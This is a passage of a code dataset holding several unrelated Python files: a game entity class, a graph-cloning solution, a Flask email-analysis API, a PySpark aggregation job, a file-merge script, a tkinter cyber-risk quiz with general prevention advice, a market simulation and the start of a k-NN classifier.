app.run(debug=True)\n","repo_name":"hasnain40247/MusicGenreModels","sub_path":"flaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2574263231","text":"from ursina import *\n\n\nclass Plant(Entity):\n def __init__(self, position=Vec3(0, 0, 0), scale=(1, 1, 1), model='cube', texture='white_cube', rotation=(0,0,0), ptype='tree'): # possible types are:\n self.ptype=ptype\n super().__init__( # tree, mushroom, purple_flower, \n model=model, # strawberry_flower, toxic_flower\n texture=texture,\n position=position,\n scale=scale,\n rotation=rotation,\n collider='mesh',\n )","repo_name":"Brusnarq/Hacktues-8.v2","sub_path":"plant.py","file_name":"plant.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32518315479","text":"#!/usr/bin/env python2.7\n\n\n'''\nClone an undirected graph. Each node in the graph contains a label and a list of its neighbors.\n\n\nOJ's undirected graph serialization:\nNodes are labeled uniquely.\n\nWe use # as a separator for each node, and , as a separator for node label and each neighbor of the node.\nAs an example, consider the serialized graph {0,1,2#1,2#2,2}.\n\nThe graph has a total of three nodes, and therefore contains three parts as separated by #.\n\nFirst node is labeled as 0. Connect node 0 to both nodes 1 and 2.\nSecond node is labeled as 1. Connect node 1 to node 2.\nThird node is labeled as 2. Connect node 2 to node 2 (itself), thus forming a self-cycle.\nVisually, the graph looks like the following:\n\n 1\n / \\\n / \\\n 0 --- 2\n / \\\n \\_/\n'''\n\n# Definition for a undirected graph node\n# class UndirectedGraphNode(object):\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nimport src.data_structure\n\nclass Solution(object):\n def clone_graph(self, node):\n if node is None:\n return None\n q = [node]\n d = dict()\n ret = src.data_structure.UndirectedGraphNode(node.label)\n d[node] = ret\n while q:\n tmp = q.pop(0)\n neighbor_list = tmp.neighbors\n for item in neighbor_list:\n if item in d:\n d[tmp].neighbors.append(d[item])\n else:\n new_node = src.data_structure.UndirectedGraphNode(item.label)\n d[item] = new_node\n d[tmp].neighbors.append(d[item])\n q.append(item)\n return ret\n","repo_name":"fifa007/Leetcode","sub_path":"src/clone_graph.py","file_name":"clone_graph.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32189710457","text":"# Import Utilities\nfrom Utilities import get_body_statistics, get_subject_statistics\nimport flask\nfrom flask_cors import CORS\n\napp = flask.Flask(__name__)\n# app.config[\"DEBUG\"] = True\nCORS(app)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"Hello world!\"\n\n# Submit an email Body and Subject and it'll analyze\n@app.route('/email_analysis', methods=['POST'])\ndef email_analyzer():\n request_data = flask.request.get_json()\n if \"body\" not in request_data.keys():\n message = {\n 'status': 400,\n 'message': \"You must include a 'body' object in the request\"\n }\n resp = flask.jsonify(message)\n resp.status_code = 400\n return resp\n\n if \"subject\" not in request_data.keys():\n message = {\n 'status': 400,\n 'message': \"You must include a 'subject' object in the request\"\n }\n resp = flask.jsonify(message)\n resp.status_code = 400\n return resp\n\n if request_data[\"body\"] == \"\":\n body_statistics = {\n \"empty\": True\n }\n else:\n body_statistics = get_body_statistics(request_data[\"body\"])\n # If subject doesn't exist\n if request_data[\"subject\"] == \"\":\n subject_statistics = {\n \"empty\": True\n }\n else:\n subject_statistics = get_subject_statistics(request_data[\"subject\"])\n\n email_statistics = {\n \"body_statistics\": body_statistics,\n \"subject_statistics\": subject_statistics\n }\n\n message = {\n 'status': 200,\n 'message': 'OK',\n 'email_statistics': email_statistics\n }\n\n resp = flask.jsonify(message)\n resp.status_code = 200\n return resp\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"rreynolds46/emailanalyzer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28803764505","text":"# pyspark --master yarn --conf spark.ui.port=12990 --packages com.databricks:spark-avro_2.10:2.0.1\n\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SQLContext\n\nconf = SparkConf().setAppName('problem1').setMaster('yarn-client')\n\nsc = SparkContext(conf=conf)\n\nsqlContext = SQLContext(sc)\n\nsqlContext.setConf('spark.sql.avro.compression.codec','snappy')\n\nordersDF = sqlContext.read.load('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/orders', 'com.databricks.spark.avro')\n\norderItemsDF = sqlContext.read.load('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/order-items','com.databricks.spark.avro')\n\nordersDF.registerTempTable('orders')\n\norderItemsDF.registerTempTable('order_items')\n\nresultDF = sqlContext.sql('\\\n select to_date(from_unixtime(o.order_date/1000)) as order_date, o.order_status, sum(oi.order_item_subtotal) as total_amount, count(distinct o.order_id) as total_orders \\\n from orders o \\\n join order_items oi \\\n on o.order_id == oi.order_item_order_id \\\n group by o.order_date, o.order_status \\\n order by o.order_date desc, o.order_status, total_amount desc,total_orders')\n\nsqlContext.setConf('spark.sql.parquet.compression.codec','gzip')\n\nresultDF.write.mode('overwrite').save('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-gzip', \"parquet\")\n\nsqlContext.setConf('spark.sql.parquet.compression.codec','snappy')\n\nresultDF.write.mode('overwrite').save('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-snappy','parquet')\n\nsqlContext.setConf('spark.sql.csv.compression.codec','uncompressed')\n\nresultDF.map(lambda line: str(line[0]) + \",\" + line[1] + \",\" + str(line[2]) +\",\" + str(line[3])).coalesce(1).saveAsTextFile('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-csv')","repo_name":"marwaadihu/spark-practice","sub_path":"arun-teaches-u-tech-blogspot-com-problem-1/problem-1.py","file_name":"problem-1.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23700250771","text":"import os\r\nimport shutil\r\n\r\n\r\ndef get_new_filepath(out_dir, label):\r\n filepath = f\"{out_dir}/{label}.jpg\"\r\n if os.path.exists(filepath):\r\n i = 1\r\n _, suffix = os.path.splitext(filepath)\r\n while True:\r\n filepath = f\"{out_dir}/{label}_{i}{suffix}\"\r\n if not os.path.exists(filepath):\r\n break\r\n i = i + 1\r\n return filepath\r\n\r\n\r\nif __name__ == \"__main__\":\r\n label_path = [\"evalImageSet_old/eval.txt\", \"./image_1/label.txt\", \"./image_2/label.txt\", \"./image_3/label.txt\"]\r\n out_image_dir = \"evalImageSet\"\r\n out_label_path = \"eval.txt\"\r\n\r\n if not os.path.exists(out_image_dir):\r\n os.mkdir(out_image_dir)\r\n\r\n # read\r\n label_txt = []\r\n for i, path in enumerate(label_path):\r\n with open(path, mode='r', encoding='utf-8') as f:\r\n label_txt.append(f.readlines())\r\n\r\n # merge\r\n brackets_cnt, too_many_equal_cnt = 0, 0\r\n filepath, label = [], []\r\n for i in range(max([len(txt) for txt in label_txt])):\r\n for j in range(len(label_txt)):\r\n if i >= len(label_txt[j]):\r\n continue\r\n txt: list[str] = label_txt[j]\r\n p, l = txt[i].strip().split('\\t') \r\n if \"(\" in l or \")\" in l:\r\n brackets_cnt += 1\r\n continue\r\n if l.count('=') >= 2:\r\n too_many_equal_cnt += 1\r\n continue\r\n filepath.append(p)\r\n label.append(l)\r\n\r\n # write\r\n print(f\"括号数量: {brackets_cnt}, 两个以上等号数量: {too_many_equal_cnt}\")\r\n print(f\"file number = {len(filepath)}\")\r\n i = 1\r\n for p, l in zip(filepath, label):\r\n try:\r\n old_p = p\r\n new_p = get_new_filepath(out_image_dir, l)\r\n shutil.copyfile(old_p, new_p)\r\n # print(f\"{i}: {p} -> {new_p}\")\r\n with open(out_label_path, mode=\"a+\", encoding=\"utf-8\") as f:\r\n f.write(f\"{new_p}\\t{l}\\n\")\r\n if not os.path.exists(new_p):\r\n print(f\"{i}: error in {new_p}\")\r\n i += 1\r\n except Exception as e:\r\n with open('log.txt', mode='a+', encoding='utf-8') as f:\r\n f.write(f\"{p}: {e}\\n\")\r\n print('Reason:', e)\r\n continue\r\n\r\n\r\n","repo_name":"fioepq9/simple-expression-corrector","sub_path":"server/trainer/data/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36251656190","text":"from tkinter import *\r\nwindow=Tk()\r\nwindow.title('Risk Assessment Tool')\r\nwindow.iconbitmap('C:/gui/RAexamplelogo.ico')\r\nwindow['bg']='light blue'\r\ntitle=Label(window,text='RA Tool',font=('Arial',40), bg='light blue')\r\ntitle.place(x=600, y=50)\r\nlabelComp=Label(window,text='Company Name =',font=('Arial',30), bg='light blue')\r\nlabelComp.place(x=150,y=250)\r\nnameEntered=Entry(window,font=('Arial',30))\r\nnameEntered.place(x=500,y=250)\r\nworm=0\r\nransomware=0\r\nsqli=0\r\ntrojan=0\r\n\r\ndef questions1():\r\n compName=nameEntered.get()\r\n quesNumb1=Label(window,text='Question 1:',font=('Arial',40), bg='light blue')\r\n quesNumb1.place(x=570, y=20)\r\n question1=Label(window,text='How many users do you have?',font=('Arial',30), bg='light blue')\r\n question1.place(x=499,y=100)\r\n\r\n def worm2():\r\n global worm\r\n worm +=1\r\n labelw2=Label(window)\r\n labelw2.pack()\r\n labelw2.after(10,questions2)\r\n\r\n def ransomware2():\r\n global ransomware\r\n ransomware +=1\r\n labelr2=Label(window)\r\n labelr2.pack()\r\n labelr2.after(10,questions2)\r\n\r\n def questions2():\r\n\r\n quesNumb2=Label(window,text='Question 2',font=('Arial',40), bg='light blue')\r\n quesNumb2.place(x=570, y=20)\r\n question2=Label(window,text='How often do you perfom scans',font=('Arial',30), bg='light blue')\r\n question2.place(x=499,y=100)\r\n\r\n def trojan3():\r\n\r\n global trojan\r\n trojan +=1\r\n labelt3=Label(window)\r\n labelt3.pack()\r\n labelt3.after(10,questions3)\r\n\r\n def ransomware3():\r\n global ransomware\r\n ransomware +=1\r\n labelr3 = Label(window)\r\n labelr3.pack()\r\n labelr3.after(10,questions3)\r\n\r\n def questions3():\r\n \r\n quesNumb3=Label(window,text='Question 3',font=('Arial',40), bg='light blue')\r\n quesNumb3.place(x=570, y=20)\r\n question3=Label(window,text='Do you backup regularly?',font=('Arial',30), bg='light blue')\r\n question3.place(x=499,y=100)\r\n\r\n def worm4():\r\n\r\n global worm\r\n worm +=1\r\n labelw4=Label(window)\r\n labelw4.pack()\r\n labelw4.after(10,questions4)\r\n\r\n def questions4():\r\n\r\n quesNumb4=Label(window,text='Question 4',font=('Arial',40), bg='light blue')\r\n quesNumb4.place(x=570, y=20)\r\n question4=Label(window,text='In what range is your income',font=('Arial',30), bg='light blue')\r\n question4.place(x=499,y=100)\r\n\r\n def ransomware5():\r\n\r\n global ransomware\r\n ransomware +=1\r\n labelr5=Label(window)\r\n labelr5.pack()\r\n labelr5.after(10,questions5)\r\n\r\n def sqli5():\r\n\r\n global sqli\r\n sqli +=1\r\n labels5=Label(window)\r\n labels5.pack()\r\n labels5.after(10,questions5)\r\n\r\n def questions5():\r\n\r\n quesNumb5=Label(window,text='Question 5',font=('Arial',40), bg='light blue')\r\n quesNumb5.place(x=570, y=20)\r\n question5=Label(window,text='Do you implement website download restrictions?',font=('Arial',30), bg='light blue')\r\n question5.place(x=290,y=100)\r\n\r\n def ransomware6():\r\n\r\n global ransomware\r\n ransomware +=1\r\n labelr6=Label(window)\r\n labelr6.pack()\r\n labelr6.after(10,questions6)\r\n\r\n def sqli6():\r\n\r\n global sqli\r\n sqli +=1\r\n labels6=Label(window)\r\n labels6.pack()\r\n labels6.after(10,questions6)\r\n\r\n def questions6():\r\n\r\n quesNumb6=Label(window,text='Question 6',font=('Arial',40), bg='light blue')\r\n quesNumb6.place(x=570, y=20)\r\n question6=Label(window,text='Do you utilise anti-virus?',font=('Arial',30), bg='light blue')\r\n question6.place(x=420,y=100)\r\n\r\n def worm7():\r\n\r\n global worm\r\n worm +=1\r\n labelw7=Label(window)\r\n labelw7.pack()\r\n labelw7.after(10,questions7)\r\n\r\n def sqli7():\r\n\r\n global sqli\r\n sqli +=1\r\n labels7=Label(window)\r\n labels7.pack()\r\n labels7.after(10,questions7)\r\n\r\n def questions7():\r\n\r\n quesNumb7=Label(window,text='Question 7',font=('Arial',40), bg='light blue')\r\n quesNumb7.place(x=570, y=20)\r\n question7=Label(window,text='How consistently do you update hardware?',font=('Arial',30), bg='light blue')\r\n question7.place(x=400,y=100)\r\n\r\n def trojan8():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt8=Label(window)\r\n labelt8.pack()\r\n labelt8.after(10,questions8)\r\n \r\n def sqli8():\r\n \r\n global worm\r\n worm +=1\r\n labelw8=Label(window)\r\n labelw8.pack()\r\n labelw8.after(10,questions8)\r\n \r\n def questions8():\r\n\r\n quesNumb8=Label(window,text='Question 8',font=('Arial',40), bg='light blue')\r\n quesNumb8.place(x=570, y=20)\r\n question8=Label(window,text='Do you implement email download restrictions?',font=('Arial',30), bg='light blue')\r\n question8.place(x=400,y=100)\r\n\r\n\r\n def worm9():\r\n \r\n global worm\r\n worm +=1\r\n labelw9=Label(window)\r\n labelw9.pack()\r\n labelw9.after(10,questions9)\r\n \r\n def questions9():\r\n\r\n quesNumb9=Label(window,text='Question 9',font=('Arial',40), bg='light blue')\r\n quesNumb9.place(x=570, y=20)\r\n question9=Label(window,text='Do you recieve frequent scam emails?',font=('Arial',30), bg='light blue')\r\n question9.place(x=450,y=100)\r\n\r\n def trojan10():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,questions10)\r\n \r\n def questions10():\r\n\r\n quesNumb10=Label(window,text='Question 10',font=('Arial',40), bg='light blue')\r\n quesNumb10.place(x=570, y=20)\r\n question10=Label(window,text='Where do you devote the least amount of security?',font=('Arial',30), bg='light blue')\r\n question10.place(x=350,y=100)\r\n\r\n def trojanF():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def sqliF():\r\n \r\n global sqli\r\n sqli +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def wormF():\r\n \r\n global worm\r\n worm +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def ransomwareF():\r\n \r\n global ransomware\r\n ransomware +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,final)\r\n\r\n def final():\r\n if worm > sqli and worm > trojan and worm > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a worm attack',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='When suffering from a worm it can result in massive losses due to it’s highly infectious spreading\\n methods. Preventing worms can be helped through limiting the reliance on the internet. Worms can \\neasily spread through connections, the internet being no different as such limit website access and \\n email downloads. Additionally keeping your system spread across various servers with few \\nconnections can help slow the spread of a worm. In the event of a worm attack limit employee \\nconnectivity to one another on the system as more employees means more targets and damages.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif sqli > worm and sqli > trojan and sqli > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a sql injection',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='The best way to avoid an SQL Injection is sanitisation of code. Implementing secure methods such as \\nwhite lists, character escaping, parametered statements and utilising firewalls can help mitigate the \\nthreat. Don’t leave database errors on the front end as it offers an “in” for attackers',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif trojan > sqli and trojan > worm and trojan > ransomware:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are risk of a Trojan attack.',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='Trojans establish a backdoor for hackers to enter your system. Prevention begins with caution, don’t \\ninstall any software from emails without confirming the sender is not malicious. If in a larger \\ncompany you may need to implement restrictions on various websites and sources. As it is with \\nmany cases of security keeping up to date and utilising an Anti-virus can vastly improve protection \\nfrom a Trojan attack. If in the event these preventative measures are not enough you may need to \\nrely on backups to restore systems to a safe state, as such regular backups are necessary.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n elif ransomware > worm and ransomware > trojan and ransomware > sqli:\r\n label_N=Label(window,text=compName,font=('Arial',15), bg='light blue')\r\n label_N.place(x=400,y=150)\r\n label_P=Label(window,text=':You are at risk of a ransomware attack.',font=('Arial',11), bg='light blue')\r\n label_P.place(x=500,y=150)\r\n label_P=Label(window,text='Ransomware can be costly so prevention is very important. The best method to avoid ransomware is \\nto not click unsolicited links. Ensure you are up to date in both software and hardware terms.\\n Tracking background tasks can ensure you know what is running on your system \\nand can help you understand if your in the process of being compromised. Backups are entirely \\nnecessary to counter Ransomware, though the backup must be kept on another device from yours. \\nBackups can completely bypass the threat ransomware can pose.',font=('Arial',9), bg='light blue')\r\n label_P.place(x=650,y=250, anchor=\"center\")\r\n else:\r\n label_P=Label(window,text='An Error Occured.',font=('Arial',15), bg='light blue')\r\n label_P.place(x=590,y=250)\r\n\r\n\r\n def end():\r\n window.destroy()\r\n\r\n endButton=Button(window,height=1,width=10,text='Close',font=('Arial',30),command=end)\r\n endButton.place(x=500,y=390)\r\n\r\n quesNumb10.destroy()\r\n question10.destroy()\r\n choice101.destroy()\r\n choice102.destroy()\r\n choice103.destroy()\r\n choice104.destroy()\r\n\r\n choice101=Button(window,height=1,width=10,text='Passwords',font=('Arial',30),command=ransomwareF)\r\n choice101.place(x=400,y=200)\r\n choice102=Button(window,height=1,width=10,text='Whitelisting',font=('Arial',30),command=sqliF)\r\n choice102.place(x=800,y=200)\r\n choice103=Button(window,height=1,width=10,text='Emails',font=('Arial',30),command=wormF)\r\n choice103.place(x=400,y=300)\r\n choice104=Button(window,height=1,width=10,text='Downloads',font=('Arial',30),command=trojanF)\r\n choice104.place(x=800,y=300)\r\n\r\n quesNumb9.destroy()\r\n question9.destroy()\r\n choice91.destroy()\r\n choice92.destroy()\r\n\r\n choice91=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=trojan10)\r\n choice91.place(x=400,y=200)\r\n choice92=Button(window,height=1,width=10,text='No',font=('Arial',30),command=questions10)\r\n choice92.place(x=800,y=200)\r\n\r\n quesNumb8.destroy()\r\n question8.destroy()\r\n choice81.destroy()\r\n choice82.destroy()\r\n\r\n choice81=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions9)\r\n choice81.place(x=400,y=200)\r\n choice82=Button(window,height=1,width=10,text='No',font=('Arial',30),command=worm9)\r\n choice82.place(x=800,y=200)\r\n\r\n quesNumb7.destroy()\r\n question7.destroy()\r\n choice71.destroy()\r\n choice72.destroy()\r\n choice73.destroy()\r\n\r\n choice71=Button(window,height=1,width=10,text='Frequently',font=('Arial',30),command=questions8)\r\n choice71.place(x=400,y=200)\r\n choice72=Button(window,height=1,width=10,text='Infrequently',font=('Arial',30),command=trojan8)\r\n choice72.place(x=800,y=200)\r\n choice73=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=sqli8)\r\n choice73.place(x=600,y=300)\r\n\r\n\r\n quesNumb6.destroy()\r\n question6.destroy()\r\n choice61.destroy()\r\n choice62.destroy()\r\n choice63.destroy()\r\n\r\n choice61=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions7)\r\n choice61.place(x=400,y=200)\r\n choice62=Button(window,height=1,width=10,text='No',font=('Arial',30), command=worm7)\r\n choice62.place(x=800,y=200)\r\n choice63=Button(window,height=1,width=10,text='Somewhat',font=('Arial',30),command=sqli7)\r\n choice63.place(x=600,y=300)\r\n\r\n quesNumb5.destroy()\r\n question5.destroy()\r\n choice51.destroy()\r\n choice52.destroy()\r\n choice53.destroy()\r\n\r\n choice51=Button(window,height=1,width=10,text='Yes',font=('Arial',30),command=questions6)\r\n choice51.place(x=400,y=200)\r\n choice52=Button(window,height=1,width=10,text='Some',font=('Arial',30),command=sqli6)\r\n choice52.place(x=600,y=300)\r\n choice53=Button(window,height=1,width=10,text='No',font=('Arial',30),command=ransomware6)\r\n choice53.place(x=800,y=200)\r\n\r\n quesNumb4.destroy()\r\n question4.destroy()\r\n choice41.destroy()\r\n choice42.destroy()\r\n\r\n\r\n choice41=Button(window,height=1,width=10,text='<100,000',font=('Arial',30),command= ransomware5)\r\n choice41.place(x=400,y=200)\r\n choice42=Button(window,height=1,width=10,text='>100,000',font=('Arial',30),command= sqli5)\r\n choice42.place(x=800,y=200)\r\n\r\n quesNumb3.destroy()\r\n question3.destroy()\r\n choice31.destroy()\r\n choice32.destroy()\r\n choice33.destroy()\r\n choice34.destroy()\r\n\r\n\r\n choice31=Button(window,height=1,width=10,text='monthly',font=('Arial',30),command=questions4)\r\n choice31.place(x=400,y=200)\r\n choice32=Button(window,height=1,width=10,text='<6months',font=('Arial',30),command=worm4)\r\n choice32.place(x=800,y=200)\r\n choice34=Button(window,height=1,width=10,text='>6 months',font=('Arial',30),command=worm4)\r\n choice34.place(x=800,y=300)\r\n choice33=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=worm4)\r\n choice33.place(x=400,y=300)\r\n\r\n quesNumb2.destroy()\r\n question2.destroy()\r\n choice21.destroy()\r\n choice22.destroy()\r\n choice23.destroy()\r\n choice24.destroy()\r\n\r\n choice21=Button(window,height=1,width=10,text='Daily',font=('Arial',30),command=questions3)\r\n choice21.place(x=400,y=200)\r\n choice22=Button(window,height=1,width=10,text='Weekly',font=('Arial',30),command=trojan3)\r\n choice22.place(x=800,y=200)\r\n choice23=Button(window,height=1,width=10,text='Monthly',font=('Arial',30),command=ransomware3)\r\n choice23.place(x=400,y=300)\r\n choice24=Button(window,height=1,width=10,text='Never',font=('Arial',30),command=ransomware3)\r\n choice24.place(x=800,y=300)\r\n\r\n quesNumb1.destroy()\r\n question1.destroy()\r\n choice1.destroy()\r\n choice2.destroy()\r\n choice3.destroy()\r\n choice4.destroy()\r\n\r\n choice1=Button(window,height=1,width=10,text='1000+',font=('Arial',30),command=ransomware2)\r\n choice1.place(x=400,y=200)\r\n choice2=Button(window,height=1,width=10,text='500-1000',font=('Arial',30),command=worm2)\r\n choice2.place(x=800,y=200)\r\n choice3=Button(window,height=1,width=10,text='250-500',font=('Arial',30),command=worm2)\r\n choice3.place(x=400,y=300)\r\n choice4=Button(window,height=1,width=10,text='0-250',font=('Arial',30),command=worm2)\r\n choice4.place(x=800,y=300)\r\n title.destroy()\r\n labelComp.destroy()\r\n nameEntered.destroy()\r\n button1.destroy()\r\n\r\nbutton1=Button(window,height=1,width=10,text='Submit',font=('Arial',30),command=questions1)\r\nbutton1.place(x=600,y=350)\r\n\r\nwindow.mainloop()\r\n","repo_name":"Lane-Eimhin/Risk-Assessment-Tool","sub_path":"RiskAssessmentTool.py","file_name":"RiskAssessmentTool.py","file_ext":"py","file_size_in_byte":22932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13192048316","text":"import random\nimport time\nfrom threading import Thread, Lock\nimport logging\nimport numpy\n\nfrom constants import tick_time, seed\nfrom google_ads import GoogleAds\nfrom market import Market\nfrom twitter import Twitter\n\nrandom.seed(seed)\n\n\nclass Customer(object):\n def __init__(self, name, wallet, tolerance=0.5):\n self.name, self.wallet, self.tolerance = name, wallet, tolerance\n logging.info (\"[Customer]:Customer %s Created\",self.name)\n # Register the user with google ads\n GoogleAds.register_user(self)\n\n # ad space stores all the adverts consumed by this user\n self.ad_space = set()\n # stores all the bought products\n self.owned_products = set()\n\n # flag to stop thread\n self.STOP = False\n\n # regulate synchronisation\n self.lock = Lock()\n self.tickcount=0\n # start this user in separate thread\n self.thread = Thread(name=name, target=self.loop)\n self.thread.start()\n \n \n \n # View the advert to this consumer. The advert is appended to the ad_space\n def view_advert(self, product):\n self.lock.acquire()\n self.ad_space.add(product)\n self.lock.release()\n\n # Consumer decided to buy a 'product'.\n def buy(self, product):\n # if not enough money in wallet, don't proceed\n if self.wallet < product.price:\n return\n\n # purchase the product from market\n \n Market.buy(self, product)\n\n # add product to the owned products list\n self.owned_products.add(product)\n\n # money is deducted from user's wallet when purchase is completed\n def deduct(self, money):\n self.wallet -= money\n\n # User expresses his sentiment about the product on twitter\n def tweet(self, product, sentiment):\n Twitter.post(self, product, sentiment)\n\n # Loop function to keep the simulation going\n def loop(self):\n logging.info (\"[Customer]:Customer %s entered Trading\",self.name)\n while not self.STOP:\n self.tickcount+=1 \n logging.info (\"[Customer]:(%s,%d): Next Quarter Begins \",self.name,self.tickcount)\n self.tick()\n #Customer.next_q=Customer.next_q+1\n time.sleep(tick_time)\n test=', '.join(x.name for x in self.owned_products)\n logging.info(\"[Customer]: (%s,%d) own the Products:[%s] with balance of $ %d\",self.name,self.tickcount,test,self.wallet)\n logging.info(\"[Customer]: (%s,%d) Exit\", self.name,self.tickcount)\n\n # one timestep in the simulation world\n def tick(self):\n test=', '.join(x.name for x in self.ad_space)\n logging.info(\"[Customer]:(%s,%d) currently seeing ads for the Products:[%s]\",self.name,self.tickcount,test)\n self.lock.acquire()\n # user looks at all the adverts in his ad_space\n for product in self.ad_space:\n # user checks the reviews about the product on twitter\n #print(\"Products\",product.name)\n tweets = numpy.asarray(Twitter.get_latest_tweets(product.name, 100))\n #sprint(\"[\", self.name,\"]:Products\",product.name,\"Tweets=\",tweets)\n if len(tweets) == 0:\n user_sentiment = 1 \n else:\n user_sentiment =(tweets == 'POSITIVE').mean()\n\n # ANSWER d.\n # if sentiment is more than user's tolerance and user does not have the product, then he/she may buy it with 20% chance. If it already has the product, then chance of buying again is 1%\n if user_sentiment >= self.tolerance:\n if(product not in self.owned_products and random.random() < 0.1):\n logging.info(\"[Customer]:***(%s,%d)bought the new product:[%s]\",self.name,self.tickcount,product.name)\n self.buy(product)\n elif (product in self.owned_products and random.random() < 0.01):\n logging.info(\"[Customer]:$$$(%s,%d)bought the same product again:[%s]\",self.name,self.tickcount,product.name)\n self.buy(product)\n else:\n logging.info(\"[Customer]:###(%s,%d)doesn't buy any products \",self.name,self.tickcount)\n # remove the adverts from ad_space\n self.ad_space = set()\n test=', '.join(x.name for x in self.ad_space)\n logging.info(\"[Customer]:(%s,%d) Ad Space cleared \",self.name,self.tickcount)\n # with some chance, the user may tweet about the product\n if random.random() < 0.5 and len(self.owned_products) > 0:\n # he may choose any random product\n product = random.choice(list(self.owned_products))\n # sentiment in positive if the quality is higher than the tolerance\n if self.tolerance < product.quality:\n sentiment = 'POSITIVE' \n else:\n sentiment='NEGATIVE'\n # tweet sent\n self.tweet(product, sentiment)\n logging.info(\"[Customer]:(%s,%d) Posted %s tweet for the product %s\",self.name,self.tickcount,sentiment,product.name)\n self.lock.release()\n\n # set the flag to True and wait for thread to join\n def kill(self):\n self.STOP = True\n self.thread.join(timeout=0)\n\n def __str__(self):\n return self.name\n \n def log_roundstatus(self):\n pass\n","repo_name":"CentIIO/IS5006","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43438123080","text":"'''\nknn.py accepts path of the dataset, k-NN hyperparameters through command line argument,\nloads and preprocesses images in the dataset, encodes label, fits a k-NN model on the dataset,\nand evaluates the classifier performance\n\nusage: python knn.py [-h] -d DATASET [-k NEIGHBORS] [-j JOBS] \n'''\n\n# import the required package\n# KNeighborsClassifier contains the implementation of the k-NN algorithm\n# LabelEncoder converts labels represented as strings to integers \n# train_test_split creates the training and testing split\n# classification_report helps evaluate the classifier performance through a table\n# paths - grabs the file path to all images in the dataset\n# argparse - accepting command line arguments\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom pyimagesearch.preprocessing.simplepreprocessor import SimplePreprocessor\nfrom pyimagesearch.datasets.simpledatasetloader import SimpleDatasetLoader\nfrom imutils import paths\nimport argparse\n\n# construct the argument parse and parse the arguments\n# --jobs - optional, the number of concurrent jobs to run when computing the distance between\n# an input data point and the training set\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required = True, help = \"Path to input dataset\")\nap.add_argument(\"-k\", \"--neighbors\", type = int, default = 1, help = \"# of nearest neighbors for classification\")\nap.add_argument(\"-j\", \"--jobs\", type = int, default = -1, help = \"# of concurrent jobs to k-NN distance (-1 uses all available cores\")\nargs = vars(ap.parse_args())\n\n# grab the file path of images in our dataset\nprint(\"[INFO] Loading images...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\n\n# initialize the image preprocessor, load the dataset from disk,\n# and reshape the data matrix\n\nsp = SimplePreprocessor(32, 32)\n\n# supplying instantiated SimplePreprocessor in a list as an argument, \n# implying that sp will be applied to every image in the dataset\nsdl = SimpleDatasetLoader(preprocessors = [sp])\n# load() returns a tuple containing input images and their corresponding labels\n(data, labels) = sdl.load(imagePaths, verbose = 500)\n\n# flatten the image: 32 x 32 